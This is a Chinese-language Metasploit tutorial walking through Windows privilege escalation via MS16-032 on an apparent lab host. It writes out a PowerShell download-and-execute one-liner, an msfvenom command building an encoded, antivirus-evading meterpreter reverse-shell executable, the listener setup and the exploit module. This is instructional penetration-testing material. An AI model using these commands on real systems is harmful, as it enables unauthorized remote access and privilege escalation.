一、MSF提权

Metasploit是一个漏洞利用框架,简称msf。默认情况kail直接封装msf任工具。

msf-般会有四种接口对外提供, msfconsole、 msfc、 msfgui以及 msfet,我们主要以 msfconsole来做讲解与演示。

1.msfconsole 基本使用命令

启动: msfconsole

img

使用指南:help

img

基础命令

search ms17 #查找

use exploit/multi/handler #使用 

info #查看信息 

show exploits/payloads/options #显示可用信息 

set options/payload #给相关对象赋值 

exploit/run #执行 

exploit #后台运行 

back #返回上一级 

sessions -i  #查看当前可用会话 

sessions -K #杀死所有活跃会话

2.模块

exploit

利用程序,针对漏洞、权限进行利用,是主要使用的模块

img

payload

用于在目标系统中运行任意命令或者执行特定代码,主要用于shell获取

img

auxiliary

该模块包含了扫描、嗅探、指纹识别、网络协议欺骗等相关功能模块

img

encode

r该模块主要针对 exploit模块进行代码免杀,以逃过杀毒软件、防火墙、ids等安全防护机制的检测

img

3.实战 ms16-032提权

1.查看当前权限、版本、ip等,发现是一个win7专业权限很低的用户

img

img

img

2.远程加载sherlock查看当前版本漏洞信息并导入一个1.txt文件中

powershell -nop -exec -bypass -c "IEX (New-Object Net.Webclient).DownloadString('http://192.168.10.100/Sherlock.ps1'); Find-Allvulns" >1.txt

powershell -nop -exec -bypass -c "Import-Module Sherlock.ps1; Find-Allvulns" >1.txt

img

执行完成并返回一个1.txt,查看漏洞信息

img

发现版本是64位的暂不支持漏洞

3.我们使用msf做一个木马程序

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.168.119.130 LPORT=4444 -f exe > 1.exe

参数说明:

  1. -p payload
  2. -e 编码方式
  3. -i 编码次数
  4. -b 在生成的程序中避免出现的值
  5. LHOST,LPORT 监听上线的主机IP和端口
  6. -f exe 生成EXE格式

设置本地监听

msf6 > use exploit/multi/handler

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

img

上传之靶机web 运行 这里我们 ip 端口4443 设置错了 重新改一下 192.168.119.130:4443

前面的 exe文件也要重新生成

执行

img

查看一下权限 没问题版本权限很低

img

还是使用sherlock 查看 漏洞

powershell -exec -bypass -c "sherlock.ps1; Find-Allvulns" >2.txt

img

img

选择一个当前版本的漏洞使用

这里演示MS16_032的漏洞

use exploit/windows/local/ms16_032_secondary_logon_handle_privesc

设置payload session LHOST LPORT

msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set payload windows/meterpreter/reverse_tcp

img

img

运行即可获得shell

img

results matching ""

    No results matching ""